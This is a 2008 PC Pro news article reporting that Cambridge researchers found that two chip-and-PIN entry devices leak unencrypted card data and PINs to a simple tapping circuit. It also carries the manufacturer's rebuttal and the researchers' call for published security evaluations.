Printed from www.pcpro.co.uk
Cambridge team hijacks chip and PIN
Posted on 28 Feb 2008 at 12:01
Researchers at Cambridge University have discovered a simple method of capturing data from chip and PIN payment cards.
The team of Saar Drimer, Steven J Murdoch and Ross Anderson, found the vulnerability in two common PIN entry devices (PED), the small card reading terminal at shop checkouts. By inserting a simple data-tapping circuit into the PED, the researchers were able to read the unencrypted data that passed between the card and the reader.
They successfully demonstrated the exploit on a real terminal borrowed from a retailer.
"These PEDs failed to protect the communication path that carries the card data from the card to the PIN pad, and that carries the PIN from the PIN pad back to the card," says Drimer. "A villain who taps this gets all the information he needs to make a fake card, and to use it."
The stolen PIN and card data could be copied to magnetic strips on counterfeit cards, which could then by used in overseas ATMs or any other device that does not yet use chip technology.
Ingenico, which manufactures one of the PEDs identified by the researchers said that they risk had been exaggerated.
"Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47% year-on-year," the company claims in a statement.
The UK payments association APACS declined to comment until it had seen full details of the researchers findings, which for security reasons have not been made public.
And the researchers warned that the risk may not be confined to PEDs.
"The lessons we learned are not limited to banking," says Anderson, who is professor of security engineering at Cambridge. "Other fields, from voting machines to electronic medical record systems, suffer from the same combination of stupid mistakes, sham evaluations and obstructive authorities.
"Where the public are forced to rely on the security of a system, we need honest security evaluations that are published and subjected to peer review."
Author: Simon Aughton
advertisement
- Why Britain's watchdogs have fewer teeth than goldfish
- Tabbed documents: how to make Office 2010 great
- Outlook 2010 People Pane – does it spell death to Xobni
- Microsoft Outlook 2010 screenshots
- Co-Authoring in Word 2010 and SharePoint Foundation 2010
- Microsoft Outlook 2010 screenshots: Backstage view
- Flash 10.1: Developing for Desktop and Device
- Microsoft Office 2010 screenshots: Recover unsaved items
- Microsoft Word 2010 screenshots: Text Effects
- Microsoft Word 2010: inserting screenshots
- Getting to grips with Microsoft's IT Health Environment Scanner
- Virtualise your servers
- The changing face of travel gadgets
- Build your own distributed file system
- The bulletproof Dell that costs an arm and a leg
- Microsoft Office 2010 Technical Preview: Q&A
- Lawnmowers, the TyTN II and one odd insurance request
- There'll never be a bulletproof OS
- How far can we trust apps?
- Five nice touches in Outlook 2010
advertisement
